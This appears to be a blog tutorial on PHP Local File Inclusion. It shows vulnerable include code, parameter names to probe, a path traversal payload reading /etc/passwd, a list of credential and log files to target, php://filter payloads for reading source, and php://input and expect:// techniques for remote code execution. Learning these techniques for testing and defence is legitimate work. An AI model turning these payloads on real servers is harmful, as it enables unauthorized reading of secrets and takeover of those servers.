I. What is Local File Inclusion
Local File Inclusion (LFI) means unauthorized access to files on the system. This vulnerability exists when a web application includes a file without correctly sanitizing the input, allowing and attacker to manipulate the input and inject path traversal characters and include other files from the web server. This vulnerability lets the attacker gain access to sensitive files on the server, and it might also lead to gaining a shell.
Vulnerable code in php :
It arises when a php file contains some php functions such as “include”, “include_once”, “require”, “require_once”.
$file = $_GET['page'];
require($file);
$file = $_GET['page'];
require($file . ".php");
II. Identifying LFI Vulnerabilities within Web Applications
http://example.com/page=filename[.extension]
http://example.com/
view=
filename[.extension]
http://example.com/
file=
filename[.extension]
More:
?cat={payload}?dir={payload}?action={payload}?board={payload}?date={payload}?detail={payload}?file={payload}?download={payload}?path={payload}?folder={payload}?prefix={payload}?include={payload}?page={payload}?inc={payload}?locate={payload}?show={payload}?doc={payload}?site={payload}?type={payload}?view={payload}?content={payload}?document={payload}?layout={payload}?mod={payload}?conf={payload}
+ Sometimes, web application declare an error
+How to test : try to retrieve /etc/passwd file ( in some case , this technique similar to Path Traversal )
http://example.com/page=../../../../etc/passwd
If success, we got all content of
passwd
file :
/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd
/etc/group
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
$USER/.bash_history or .profile
/root/.bash_history or .profile
/etc/mtab
/etc/inetd.conf
/var/log/dmessage
/etc/httpd/logs/acces_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
PROC files
/proc/sched_debug # Can be used to see what processes the machine is running
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie
/proc/version
/proc/self/environ
2. Bypassing Php-excution
When you access file with LFI, you can easily read .txt file. But with .php file,
you cant read the content by normal method, because of php-execution.
That is because they get executed by the webserver, since their file-ending says that it contains code. This can be bypassed by using a build-in php-filter.
php://filter/convert.base64-encode/resource=index
php://filter/read=string.rot13/resource=index.php php://filter/convert.base64-encode/resource=index.php pHp://FilTer/convert.base64-encode/resource=index.php
3. Test for RFI
Remote file inclusion aka RFI occurs
when an application receives a path to a file as input for a web page and does not properly sanitize it. This allows an external URL to be supplied to the include function.?page=<url>
If LFI site load content of the site which have URL we provied , It absolutely vulnerable to RFI. We can easily upload out shell from this input to the server.
3. LFI to RCE
+ What is RCE : RCE stands for Remote Code Excution ( also known as Arbitrary code execution)
Remote Code Evaluation is a vulnerability that can be exploited if user input is injected into a File or a String and executed (evaluated) by the programming language's parser. Usually this behavior is not intended by the developer of the web application. A Remote Code Evaluation can lead to a full compromise of the vulnerable web application and also web server. It is important to note that almost every programming language has code evaluation functions.
So we have many scenarios that LFI lead to RCE , let's review !
# LFI → RCE via php Wrapper
+PHP wrapper expect://command
All about PHP expect wrapper :
https://www.php.net/manual/en/wrappers.expect.php
PHP expect:// allows execution of system commands, unfortunately the expect PHP module is not enabled by default. It's require to install extension.
+PHP wrapper php://input
Then we can send POST requst
POST DATA: <?php system('id'); ?>Example+Php wrapper ZIP://I have a post about this using Rootme challenge as example
Không có nhận xét nào:
Đăng nhận xét